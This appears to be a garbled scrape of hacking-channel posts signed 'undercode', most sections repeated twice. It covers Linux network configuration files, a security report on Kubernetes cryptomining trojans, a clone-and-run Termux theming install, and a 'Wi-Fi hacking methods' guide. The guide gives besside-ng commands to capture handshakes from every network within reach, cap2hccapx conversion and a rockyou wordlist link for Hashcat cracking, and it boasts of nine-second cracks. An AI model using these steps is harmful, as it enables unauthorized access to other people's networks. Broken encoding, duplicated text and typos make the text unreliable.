β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Quick interpretation of network configuration files
In the Linux system of iamafan , the TCP/IP network is configured through several text files, which need to be edited to complete the networking work. The important network configuration files in the system are:
β /etc/sysconfig/network
β /etc/HOSTNAME
β /etc/hosts
β /etc/services
β /etc/host.conf
β /etc/nsswitch.conf
β /etc/ resolv.conf
β /etc/rc.d/init.d/network
Next we will talk about these files one by one, these files can be modified while the system is running, without starting or stopping any daemons, the changes will take effect immediately ( Except /etc/sysconfig/network). In addition, these files all support comments starting with ""#"". Each file has an entry in Part 5 of the UNIX man page. You can use the man command to get them.
β /etc/sysconfig/network network settings
This file is used to specify network configuration information on the server, and contains parameters that control the behavior of network-related files and daemons. The following is an example file:
NETWORKING=yes
HOSTNAME=machine1
GATEWAY=210.34.6.2
FORWARD_IPV4=yes
GATEWAYDEV=
where NETWORK=yes/no indicates whether the network is configured;
HOSTNAME=hostname hostname represents the host name of the server;
GATEWAY=gw-ip gw-ip represents the IP address of the network gateway;
FORWARD_IPV4=yes/no whether to enable the IP forwarding function;
GAREWAYDEV=gw-dev gw-dw represents the device name of the gateway, Such as: eth0, etc.; in
order to be compatible with some old software, the ""/etc/HOSTNAME"" file should use the same host name as HOSTNAME=hostname.
β /etc/HOSTNAME host name
This file contains the host name of the system, including the complete domain name, such as:
192.168.0.1 machine1.domain machine1
This file is obtained from the HOSTNAME line in the file /etc/sysconfig/network at startup , Used to set the host name of the system at startup.
β /etc/hosts IP address and host name mapping
/etc/hosts contains the mapping between the IP address and the host name, including the alias of the host name, the design of the IP address makes the computer easy to identify, but it is very human It is difficult to remember them. In order to solve this problem, the file /etc/hosts was created. Here is an example file:
127.0.0.1 machine1 localhost.localdomain localhost
192.168.1.100 machine7
192.168.1.101 otherpc otheralias
In this example, the machine name is machine1, otherpc also has alias otheralias, which can point to otheralias. . Once the machine's network configuration file is configured, the network should be restarted for the changes to take effect. Use the following command to restart the network:
/etc/rc.d/init.d/network restart
/etc/hosts file usually contains the host name, localhost and the system alias frequently used by system administrators. Sometimes it takes a long time for telnet to reach the Linux machine. You can add the match between the IP address of the client's machine and the host name in "/etc/hosts". Reduce login wait time. In the absence of a domain name server, all network programs on the system resolve the IP address corresponding to a host name by querying the file, otherwise, other host names are usually resolved using DNS, and the configuration of the DNS client part is in the file / etc/resolv.conf.
β /etc/services
/etc/services contains the mapping between the service name and the port number. Many system programs use this file. The following are the first few lines in the default /etc/services when RedHat is installed:
tcpmux 1/tcp # TCP port service multiplexer
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users
The leftmost column is the host service name, and the middle column is the port number. "/" is followed by the port type, which can be TCP or UDP. Any subsequent columns are aliases of the previous service. There are also aliases in this file. They appear after the port number. In the above example, sink and null are aliases for the discard service.
π¦ Quick interpretation of network configuration files
In the Linux system of iamafan , the TCP/IP network is configured through several text files, which need to be edited to complete the networking work. The important network configuration files in the system are:
β /etc/sysconfig/network
β /etc/HOSTNAME
β /etc/hosts
β /etc/services
β /etc/host.conf
β /etc/nsswitch.conf
β /etc/ resolv.conf
β /etc/rc.d/init.d/network
Next we will talk about these files one by one, these files can be modified while the system is running, without starting or stopping any daemons, the changes will take effect immediately ( Except /etc/sysconfig/network). In addition, these files all support comments starting with ""#"". Each file has an entry in Part 5 of the UNIX man page. You can use the man command to get them.
β /etc/sysconfig/network network settings
This file is used to specify network configuration information on the server, and contains parameters that control the behavior of network-related files and daemons. The following is an example file:
NETWORKING=yes
HOSTNAME=machine1
GATEWAY=210.34.6.2
FORWARD_IPV4=yes
GATEWAYDEV=
where NETWORK=yes/no indicates whether the network is configured;
HOSTNAME=hostname hostname represents the host name of the server;
GATEWAY=gw-ip gw-ip represents the IP address of the network gateway;
FORWARD_IPV4=yes/no whether to enable the IP forwarding function;
GAREWAYDEV=gw-dev gw-dw represents the device name of the gateway, Such as: eth0, etc.; in
order to be compatible with some old software, the ""/etc/HOSTNAME"" file should use the same host name as HOSTNAME=hostname.
β /etc/HOSTNAME host name
This file contains the host name of the system, including the complete domain name, such as:
192.168.0.1 machine1.domain machine1
This file is obtained from the HOSTNAME line in the file /etc/sysconfig/network at startup , Used to set the host name of the system at startup.
β /etc/hosts IP address and host name mapping
/etc/hosts contains the mapping between the IP address and the host name, including the alias of the host name, the design of the IP address makes the computer easy to identify, but it is very human It is difficult to remember them. In order to solve this problem, the file /etc/hosts was created. Here is an example file:
127.0.0.1 machine1 localhost.localdomain localhost
192.168.1.100 machine7
192.168.1.101 otherpc otheralias
In this example, the machine name is machine1, otherpc also has alias otheralias, which can point to otheralias. . Once the machine's network configuration file is configured, the network should be restarted for the changes to take effect. Use the following command to restart the network:
/etc/rc.d/init.d/network restart
/etc/hosts file usually contains the host name, localhost and the system alias frequently used by system administrators. Sometimes it takes a long time for telnet to reach the Linux machine. You can add the match between the IP address of the client's machine and the host name in "/etc/hosts". Reduce login wait time. In the absence of a domain name server, all network programs on the system resolve the IP address corresponding to a host name by querying the file, otherwise, other host names are usually resolved using DNS, and the configuration of the DNS client part is in the file / etc/resolv.conf.
β /etc/services
/etc/services contains the mapping between the service name and the port number. Many system programs use this file. The following are the first few lines in the default /etc/services when RedHat is installed:
tcpmux 1/tcp # TCP port service multiplexer
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users
The leftmost column is the host service name, and the middle column is the port number. "/" is followed by the port type, which can be TCP or UDP. Any subsequent columns are aliases of the previous service. There are also aliases in this file. They appear after the port number. In the above example, sink and null are aliases for the discard service.
β /etc/host.conf Configure the name resolver
There are two files that declare where the system looks for name information to configure the library of UNIX name resolvers. The file /etc/host.conf is used by version 5 of the libc library, and /etc/nsswitch.conf is used by version 6 (glibc). The problem is that some programs use one and some use the other, so it is necessary to configure both files correctly.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
The /etc/host.conf file specifies how to resolve the host name. Linux uses the parser library to obtain the IP address corresponding to the host name. The following is the default content of ""/etc/host.conf" after RedHat installation:
order hosts, bind
multi on
β»""order "" specifies the host name query order, and its parameters are search methods separated by commas, support The search methods are bind, hosts, and nis, which represent DNS, /etc/hosts, and NIS, respectively. Here, it is specified to query the ""/etc/hosts" file first and then use DNS to resolve the domain name.
β»""Trim"" indicates that when the address to host name conversion is performed through DNS, the domain name will be clipped from the host name, and trim can be included multiple times by multiple domains, which is not good for /etc/hosts and NIS query methods Function, note that the host names in the /etc/hosts and NIS tables are listed appropriately (with or without the full domain name).
β»""Multi"" specifies whether the host specified in the "/etc/hosts" file can have multiple addresses. A value of on indicates that it is allowed. Hosts with multiple IP addresses are generally said to have multiple network interfaces.
β»""Nospoof "" means whether to allow IP address spoofing to the server. The value is on means not allowed. IP spoofing is a means to attack the security of the system. By disguising the IP address as another computer, you can obtain the other computerβs trust.
β»""Alert"" When the nospoof command is on, the alert controls whether the attempt to deceive is recorded by the syslog tool. The value of on indicates use, and the default value is off.
β»""Rccorder"" If set to on, all queries will be reordered, so hosts in the same subnet will be returned first, the default value is off.
β /etc/nsswitch.conf configuration name resolver
/etc/nsswitch.conf file is developed by Sun and used to manage the order of multiple configuration files in the system, it provides more than the /etc/host.conf file Function. Each line in /etc/nsswitch.conf is either a comment (beginning with a # sign) or a keyword followed by a colon and a series of sequential methods to be tried. Each keyword is in /etc/ directory which can be /etc/nsswitch. The name of the /etc file controlled by conf.
The following keywords can be included: β»aliases mail aliases;
β»passwd system users;
β»group user groups;
β»shadow hidden passwords;
β»hosts hostnames and IP addresses;
β»networks network names and numbers;
β»protocols network protocol;
β»Services port number and service name;
β»ethers Ethernet number;
β»rpc remote process call name and number
β»netgroup intranet group
The following keywords can also be included:
There are two files that declare where the system looks for name information to configure the library of UNIX name resolvers. The file /etc/host.conf is used by version 5 of the libc library, and /etc/nsswitch.conf is used by version 6 (glibc). The problem is that some programs use one and some use the other, so it is necessary to configure both files correctly.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
The /etc/host.conf file specifies how to resolve the host name. Linux uses the parser library to obtain the IP address corresponding to the host name. The following is the default content of ""/etc/host.conf" after RedHat installation:
order hosts, bind
multi on
β»""order "" specifies the host name query order, and its parameters are search methods separated by commas, support The search methods are bind, hosts, and nis, which represent DNS, /etc/hosts, and NIS, respectively. Here, it is specified to query the ""/etc/hosts" file first and then use DNS to resolve the domain name.
β»""Trim"" indicates that when the address to host name conversion is performed through DNS, the domain name will be clipped from the host name, and trim can be included multiple times by multiple domains, which is not good for /etc/hosts and NIS query methods Function, note that the host names in the /etc/hosts and NIS tables are listed appropriately (with or without the full domain name).
β»""Multi"" specifies whether the host specified in the "/etc/hosts" file can have multiple addresses. A value of on indicates that it is allowed. Hosts with multiple IP addresses are generally said to have multiple network interfaces.
β»""Nospoof "" means whether to allow IP address spoofing to the server. The value is on means not allowed. IP spoofing is a means to attack the security of the system. By disguising the IP address as another computer, you can obtain the other computerβs trust.
β»""Alert"" When the nospoof command is on, the alert controls whether the attempt to deceive is recorded by the syslog tool. The value of on indicates use, and the default value is off.
β»""Rccorder"" If set to on, all queries will be reordered, so hosts in the same subnet will be returned first, the default value is off.
β /etc/nsswitch.conf configuration name resolver
/etc/nsswitch.conf file is developed by Sun and used to manage the order of multiple configuration files in the system, it provides more than the /etc/host.conf file Function. Each line in /etc/nsswitch.conf is either a comment (beginning with a # sign) or a keyword followed by a colon and a series of sequential methods to be tried. Each keyword is in /etc/ directory which can be /etc/nsswitch. The name of the /etc file controlled by conf.
The following keywords can be included: β»aliases mail aliases;
β»passwd system users;
β»group user groups;
β»shadow hidden passwords;
β»hosts hostnames and IP addresses;
β»networks network names and numbers;
β»protocols network protocol;
β»Services port number and service name;
β»ethers Ethernet number;
β»rpc remote process call name and number
β»netgroup intranet group
The following keywords can also be included:
β»files is valid for all other keywords except netgroup. Look for records in the corresponding /etc file
β»db Except netgroup, it is valid for other keywords. Look for records in the corresponding /var/db database. Very effective for long files, such as passwd file has more than 500 items. To generate these files from the standard /etc file, change the directory to /var/db and run the run command
β»compat compatibility mode, which is valid for passwd, group, and shadow files. In this mode, you will first search in the corresponding /etc file. If you want to perform an NIS search, you need the first value (user name or group name) to be a plus sign (+ ), followed by the corresponding number of colons (:) (6 for /etc/passwd and 3 for /etc/group , /Etc/shadow is 8). As in the /etc/passwd file, the following line should be included at the end of the file: +: *
::::: β»dns is only meaningful for hosts. As configured in /etc/resolvconf, lookup in DNS
β»nis is meaningful for all keywords. If NIS is available, look in the NIS server
β»[ STATUS = action] controls the behavior of the name service. STATUS is one of SUCCESS (operation successfully executed), NOTFOUND (record not found), UNAVAIL (selected service is unavailable), and TRYAGAIN (service is temporarily unavailable, please try again). action is one of return (terminate the search and return to the current state) or continue (continue other items on this line). For example, hosts: dns nis [NOTFOUND=return] files will first be found in DNS, and then look up the host name in NIS. Only use the file /etc/hosts when the current two items are unavailable
β /etc/resolv.conf configures the DNS client
file /etc/resolv.conf configures the DNS client, which contains the domain name search order of the host and the DNS server address A line should contain a keyword and one or more parameters separated by spaces. The following is an example file:
search mydom.edu.cn
nameserver 210.34.0.14
nameserver 210.34.0.2 The
legal parameters and their meanings are as follows:
β» nameserver indicates the IP address of the DNS server. There can be many rows of nameservers, each with an IP address. When inquiring, the nameserver is carried out in the order in this file, and only when the first nameserver does not respond, the following nameserver is queried.
β»domain declares the domain name of the host. It is used by many programs, such as mail systems; it is also used when performing DNS queries for hosts without domain names. If there is no domain name, the host name will be used, delete all the content before the first dot (.).
β»Search its multiple parameters indicate the domain name search order. When you want to query a host that does not have a domain name, the host will search separately in the domain declared by search. Domain and search cannot coexist; if they exist at the same time, the ones that appear later will be used.
β»Sortlist allows specific sorting of domain name results. Its parameters are network/mask pairs, allowing arbitrary ordering. Red Hat does not provide a default /etc/resol v. conf file, its content is dynamically created based on the options given during installation.
β /etc/init.d/network The host address, subnet mask, and gateway are
not like many other UNIX and Linux operating systems. Red Hat currently cannot automatically configure the network through the /etc/hostname and /etc/hosts files . In order to change the default IP address of the host, you must directly edit the /etc/init.d/network script to reflect the correct network configuration. This file includes variables that declare the IP address, mask, network, broadcast address, and default router. Here is the corresponding part of this file:
IPADDR=192.168.1.100
NETMASK=255.255.255.0
BROADCAST=192.168.1.255
GATEWAY=192.168.1.1
β»db Except netgroup, it is valid for other keywords. Look for records in the corresponding /var/db database. Very effective for long files, such as passwd file has more than 500 items. To generate these files from the standard /etc file, change the directory to /var/db and run the run command
β»compat compatibility mode, which is valid for passwd, group, and shadow files. In this mode, you will first search in the corresponding /etc file. If you want to perform an NIS search, you need the first value (user name or group name) to be a plus sign (+ ), followed by the corresponding number of colons (:) (6 for /etc/passwd and 3 for /etc/group , /Etc/shadow is 8). As in the /etc/passwd file, the following line should be included at the end of the file: +: *
::::: β»dns is only meaningful for hosts. As configured in /etc/resolvconf, lookup in DNS
β»nis is meaningful for all keywords. If NIS is available, look in the NIS server
β»[ STATUS = action] controls the behavior of the name service. STATUS is one of SUCCESS (operation successfully executed), NOTFOUND (record not found), UNAVAIL (selected service is unavailable), and TRYAGAIN (service is temporarily unavailable, please try again). action is one of return (terminate the search and return to the current state) or continue (continue other items on this line). For example, hosts: dns nis [NOTFOUND=return] files will first be found in DNS, and then look up the host name in NIS. Only use the file /etc/hosts when the current two items are unavailable
β /etc/resolv.conf configures the DNS client
file /etc/resolv.conf configures the DNS client, which contains the domain name search order of the host and the DNS server address A line should contain a keyword and one or more parameters separated by spaces. The following is an example file:
search mydom.edu.cn
nameserver 210.34.0.14
nameserver 210.34.0.2 The
legal parameters and their meanings are as follows:
β» nameserver indicates the IP address of the DNS server. There can be many rows of nameservers, each with an IP address. When inquiring, the nameserver is carried out in the order in this file, and only when the first nameserver does not respond, the following nameserver is queried.
β»domain declares the domain name of the host. It is used by many programs, such as mail systems; it is also used when performing DNS queries for hosts without domain names. If there is no domain name, the host name will be used, delete all the content before the first dot (.).
β»Search its multiple parameters indicate the domain name search order. When you want to query a host that does not have a domain name, the host will search separately in the domain declared by search. Domain and search cannot coexist; if they exist at the same time, the ones that appear later will be used.
β»Sortlist allows specific sorting of domain name results. Its parameters are network/mask pairs, allowing arbitrary ordering. Red Hat does not provide a default /etc/resol v. conf file, its content is dynamically created based on the options given during installation.
β /etc/init.d/network The host address, subnet mask, and gateway are
not like many other UNIX and Linux operating systems. Red Hat currently cannot automatically configure the network through the /etc/hostname and /etc/hosts files . In order to change the default IP address of the host, you must directly edit the /etc/init.d/network script to reflect the correct network configuration. This file includes variables that declare the IP address, mask, network, broadcast address, and default router. Here is the corresponding part of this file:
IPADDR=192.168.1.100
NETMASK=255.255.255.0
BROADCAST=192.168.1.255
GATEWAY=192.168.1.1
π¦ Quick interpretation of network configuration files full by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Beware of Linux mining Trojans invading through Kubernetes :
> Recently, the Tencent security team received feedback from some users, and some Linux hosts detected a Trojan file named docker.
> After extracting the investigation clues on site, it was found that the mining Trojan was suspected of invading through the lower version Kubernetes components. After the invasion is successful, the malicious sh script is executed in the machine, and the malicious script performs similar Trojan cleaning. At the same time, the mining machine is pulled from the 82.146.53.166 address and illegally mined after configuration. The malicious sh scripts currently seen mainly include the following 2 versions .
π¦Version one
The function ends other mining-related modules in the current machine, downloads and executes 32/64 different versions of elf miner programs to the tmp directory in the host, named docker, pulls the miner configuration, and deletes the local miner-related files after executing the miner.
π¦Version 2
The function is to end other mining related modules in the current machine, download and execute the 32/64 different versions of the elf mining machine program to the host tmp directory named php, pull the mining machine configuration, delete the local mining machine after executing the mining machine. file. This version of the script also adds scheduled tasks, and attempts to execute the sh script every minute.
π¦ Safety advice
1. Check and clean the docker name suspicious miner and php name suspicious miner files in the root directory of the host, tmp directory;
2. Troubleshoot the crontab task list and delete abnormal scheduled tasks;
3. Check the kubernetes component in the machine and upgrade it to the latest version;
4. Kubelet external access configuration authentication and authorization, prohibit anonymous access.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Beware of Linux mining Trojans invading through Kubernetes :
> Recently, the Tencent security team received feedback from some users, and some Linux hosts detected a Trojan file named docker.
> After extracting the investigation clues on site, it was found that the mining Trojan was suspected of invading through the lower version Kubernetes components. After the invasion is successful, the malicious sh script is executed in the machine, and the malicious script performs similar Trojan cleaning. At the same time, the mining machine is pulled from the 82.146.53.166 address and illegally mined after configuration. The malicious sh scripts currently seen mainly include the following 2 versions .
π¦Version one
The function ends other mining-related modules in the current machine, downloads and executes 32/64 different versions of elf miner programs to the tmp directory in the host, named docker, pulls the miner configuration, and deletes the local miner-related files after executing the miner.
π¦Version 2
The function is to end other mining related modules in the current machine, download and execute the 32/64 different versions of the elf mining machine program to the host tmp directory named php, pull the mining machine configuration, delete the local mining machine after executing the mining machine. file. This version of the script also adds scheduled tasks, and attempts to execute the sh script every minute.
π¦ Safety advice
1. Check and clean the docker name suspicious miner and php name suspicious miner files in the root directory of the host, tmp directory;
2. Troubleshoot the crontab task list and delete abnormal scheduled tasks;
3. Check the kubernetes component in the machine and upgrade it to the latest version;
4. Kubelet external access configuration authentication and authorization, prohibit anonymous access.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Customize Termux Font & Colors:
βΎββββΆβββΎββΆββΎββ & βββ :
1) apt update
2) apt install git -y
3) git clone https://github.com/htr-tech/tstyle
4) cd tstyle
5) bash setup.sh
> in on command install :
apt update && apt install git -y && git clone https://github.com/htr-tech/tstyle && cd tstyle && bash setup.sh && tstyle
6) then choose options via numbers
π¦Features :
Latest Fonts & Themes
Full Offline !
Easy to Use !
β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Customize Termux Font & Colors:
βΎββββΆβββΎββΆββΎββ & βββ :
1) apt update
2) apt install git -y
3) git clone https://github.com/htr-tech/tstyle
4) cd tstyle
5) bash setup.sh
> in on command install :
apt update && apt install git -y && git clone https://github.com/htr-tech/tstyle && cd tstyle && bash setup.sh && tstyle
6) then choose options via numbers
π¦Features :
Latest Fonts & Themes
Full Offline !
Easy to Use !
β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - htr-tech/tstyle: Customize Termux Font & Colors
Customize Termux Font & Colors. Contribute to htr-tech/tstyle development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Wi-Fi hacking methods in 2020 :
What you need to hack Wi-Fi ?
1) You need a sufficient number of wireless networks. If you live on the edge of the village and you have within your reach one Wi-Fi network that you can see, then it is invisible that there are not many chances.
The more networks in the area, the better.
2) There are no special hardware requirements, and for some attacks even Wi-Fi adapters that do not support monitor mode are suitable. Nevertheless, I highly recommend adapters with an external antenna, and if the antenna is removable, it is better to buy another larger one. IMHO, half the "skills" of a Wi-Fi cracker in a large antenna ...
π¦ Wi-Fi hacking methods in 2020 :
What you need to hack Wi-Fi ?
1) You need a sufficient number of wireless networks. If you live on the edge of the village and you have within your reach one Wi-Fi network that you can see, then it is invisible that there are not many chances.
The more networks in the area, the better.
2) There are no special hardware requirements, and for some attacks even Wi-Fi adapters that do not support monitor mode are suitable. Nevertheless, I highly recommend adapters with an external antenna, and if the antenna is removable, it is better to buy another larger one. IMHO, half the "skills" of a Wi-Fi cracker in a large antenna ...
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Fast brute force password L:
1)Unfortunately, there are not many access points with WPS enabled. Nevertheless, we will return to them. Now we will consider the classic version of capturing a handshake and breaking a password. Its speed is as follows:
2)automatic handshake capture for all Access Points within reach
two types of brute force with Hashcat are launched: according to the dictionary and the mask in eight digits. Experience shows that quite a few APs lend themselves to. This method also has a good ratio of time to result
3)example we put the wireless interface in monitor mode.
4) Run the command to collect handshakes:
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo besside-ng INTERFACE -W</font></font>
All handshakes will be saved to the wpa.cap file .
5) If you are going to hack them all, you can all at once convert to hashcat format using cap2hccapx :
https://kali.tools/?p=658#cap2hccapx
> <font style="vertical-align: inherit;"><font style="vertical-align: inherit;">cap2hccapx wpa.cap output.hccapx</font></font>
π¦If you only need the hash of a specific Access Point, then use the network name (ESSID) as a filter. For example, Iβm only interested in the Wi-Fi handshake of the netis56 network and I want to save it to the netis56.hccapx file :
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">cap2hccapx wpa.cap netis56.hccapx netis56</font></font>
If you want to split the wpa.cap file into separate handshakes,
6) use the script from the article β How to extract handshakes from a capture file with several handshakes β, and then also convert them with cap2hccapx .
> For a dictionary attack, I use the rockyou dictionary , a cleaned version can be downloaded from this link > https://github.com/Mi-Al/WiFi-autopwner/raw/master/dict/rockyou_cleaned.txt
π¦Example of a successful dictionary hack (hacking time 9 seconds):
π¦Fast brute force password L:
1)Unfortunately, there are not many access points with WPS enabled. Nevertheless, we will return to them. Now we will consider the classic version of capturing a handshake and breaking a password. Its speed is as follows:
2)automatic handshake capture for all Access Points within reach
two types of brute force with Hashcat are launched: according to the dictionary and the mask in eight digits. Experience shows that quite a few APs lend themselves to. This method also has a good ratio of time to result
3)example we put the wireless interface in monitor mode.
4) Run the command to collect handshakes:
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo besside-ng INTERFACE -W</font></font>
All handshakes will be saved to the wpa.cap file .
5) If you are going to hack them all, you can all at once convert to hashcat format using cap2hccapx :
https://kali.tools/?p=658#cap2hccapx
> <font style="vertical-align: inherit;"><font style="vertical-align: inherit;">cap2hccapx wpa.cap output.hccapx</font></font>
π¦If you only need the hash of a specific Access Point, then use the network name (ESSID) as a filter. For example, Iβm only interested in the Wi-Fi handshake of the netis56 network and I want to save it to the netis56.hccapx file :
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">cap2hccapx wpa.cap netis56.hccapx netis56</font></font>
If you want to split the wpa.cap file into separate handshakes,
6) use the script from the article β How to extract handshakes from a capture file with several handshakes β, and then also convert them with cap2hccapx .
> For a dictionary attack, I use the rockyou dictionary , a cleaned version can be downloaded from this link > https://github.com/Mi-Al/WiFi-autopwner/raw/master/dict/rockyou_cleaned.txt
π¦Example of a successful dictionary hack (hacking time 9 seconds):
Another example of a successful dictionary hack (hacking time 13 seconds):